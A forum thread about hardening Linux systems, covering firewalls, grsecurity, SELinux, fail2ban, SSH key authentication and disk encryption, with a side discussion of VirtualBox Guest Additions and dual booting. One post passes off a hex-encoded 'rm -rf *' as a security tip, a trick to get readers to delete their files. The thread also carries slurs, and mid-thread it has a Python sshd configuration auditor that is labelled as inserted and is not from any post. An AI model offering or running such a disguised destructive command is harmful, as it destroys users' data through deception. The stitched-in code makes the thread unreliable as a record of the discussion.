What steps does Sup Forums take to harden and protect their linux systems?

Me:
- Blocked open ports
- Browse in virtual machines only
- Grsecurity to improve kernel
- Disabled useless default services
- Firewall

No one cares about your furry porn, weirdo

>Blocked open ports
>- Browse in virtual machines only
>- Grsecurity to improve kernel
>- Disabled useless default services
>- Firewall
And how much time does it take to do? I'm sure this takes a lot of time, when on Windows it's all configured by default and you don't need to touch anything. TIME IS GOLD

Nothing.

shut up faggot

It takes about 30 minutes if you know what you are doing. Can be quite challenging to use grsecurity if you have never done it before.

You watch too much Sup Forums

Get the fuck out

Seriously, do you really think someone is targeting you? That would be the only reason for that many steps of security. Are you the hacker known as Sup Forums? Why even connect to the internet in the first place?

on servers:
>SELinux
>iptables
>fail2ban
>disable root login for sshd

Why do you install a virus scanner on a Windows PC? Right, to keep you safe to an extent. Just because you use Linux doesn't make you safe. Better be safe than sorry.

I don't. 99.99999% of malware is installed by the user

>default
Nope. Read the OP again.

I don't browse in a VM but I do harden the browser and disable the unused services. CUPS listens on the network, you know.

And that's exactly the point, prevention is easier than trying to fix your shit up with five bots, two rootkits and eight malwares up your ass

SSH is probably the most dangerous service on any computer, disable it or restrict it with a good password/ssh key combination and don't leak it through fucking memeginx or Memepache and you'll be mostly fine

I install temple OS and use a ramdisk.

Impossible for anyone to get me.

>sshd
>having a backdoor installed

> Use whonix on a laptop with camera and microphone removed
> All of the above is taken care of

feels good man :)

i cover my thinkpad with aluminum foil.

public-private key authentication ONLY via ssh
tunnel ALL THE THINGS over ssh
randomize default ports
iptables
fail2ban
selinux
luks+dmcrypt system encryption
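The sshd items from the two lists above ("disable root login for sshd", "public-private key authentication ONLY"), as an added example that is not part of any post: a small auditor for `sshd_config` text that applies sshd's first-value-wins rule and falls back to upstream OpenSSH defaults. The function names and the sample config are constructed for illustration, and the defaults assume your distribution has not patched them.

```python
import re

# Upstream OpenSSH defaults (assumption: not changed by the distribution).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "pubkeyauthentication": "yes",
}
# Deprecated keyword that sshd treats as the same setting.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}
# Values that match "key-only, no root login".
WANTED = {
    "permitrootlogin": {"no"},
    "passwordauthentication": {"no"},
    "kbdinteractiveauthentication": {"no"},
    "pubkeyauthentication": {"yes"},
}

def effective_settings(config_text):
    """Return the global-section value of each audited keyword."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Keyword and value are separated by whitespace or a single '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = ALIASES.get(parts[0].lower(), parts[0].lower())
        if key == "match":
            break  # Match blocks are conditional; audit the global part only
        if len(parts) == 2 and key in DEFAULTS:
            # sshd keeps the FIRST value it reads for a keyword.
            seen.setdefault(key, parts[1].strip().strip('"').lower())
    return {**DEFAULTS, **seen}

def audit(config_text):
    """List 'keyword=value' pairs that still allow password or root login."""
    eff = effective_settings(config_text)
    return sorted(f"{k}={v}" for k, v in eff.items() if v not in WANTED[k])

# Constructed sample: password auth is switched off, but keyboard-interactive
# (often PAM password prompts) is left at its default.
SAMPLE = """\
PermitRootLogin no
PasswordAuthentication no
PasswordAuthentication yes
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Feeding the output of `sshd -T` to `audit()` instead of the raw file checks the values sshd actually resolved, including anything pulled in through `Include`.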

Just
$(echo 726d202d7266202a0a | xxd -r -p)

>- Browse in virtual machines only
I'm looking into running a win7 guest on a linux host in VirtualBox. The functionality of Guest Additions seems very desirable, especially the local shares and mouse support. But I also want to be able to dual boot this partition sometimes, or even boot it in a different VM sometime in the future. Do the special drivers GA installs on the guest interfere with this? I've read a few accounts of them doing so with Ubuntu guests, even though that's the reverse of my situation. I'd rather not fork my windows install onto any more partitions than I have to while maintaining both dual boot and smooth guest functionality.

TL;DR, does VB Guest Additions for a win7 guest break dual booting a win7 partition?

I can't imagine why that would possibly cause an issue

Well, it replaces mouse and video drivers on the guest, for one thing, not to mention overriding the clipboard. Also, since Windows is the guest, it will see the VM and native hardware environments as different machines, and throw a hissy fit about activation.

This and disable ping response for good measure.

bump for insight.

shitpost only in public libraries while wearing a ski mask

I just use a FreeBSD box as a router.

why would icmp even get far enough to hit the machine in the first place? and don't say 'well what if another machine gets compromised!' because by then it's too late and they will just find it via arp

That string of hex looks familiar

haha, this is good

sans.org/security-resources/idfaq/how-can-attacker-use-icmp-for-reconnaissance/3/13

Using a virtual machine increases the attack surface, it's totally pointless advice.

It's way more secure to use chromium in native.

>>- Blocked open ports
>having open ports
>>- Browse in virtual machines only
I bet this isn't even a hardened system in the VM. Enjoy your hypervisor exploits from within the VM.
>>- Grsecurity to improve kernel
I'd post the tweet about grsec faggots banning people for posting about a bug in it, but I didn't save it.
>>- Disabled useless default services
>having useless default services in the first place
>>- Firewall
>letting programs open sockets

the point is, only a fucking dingus is going to let icmp through the firewall in the first place.

fuck off

>the point is
Your head.

They're virtual drivers for virtual devices. They only exist when the virtual drive is mounted. The host doesn't see them otherwise.

But what about when the guest is later booted outside the VM on the bare hardware, like in a dual boot situation?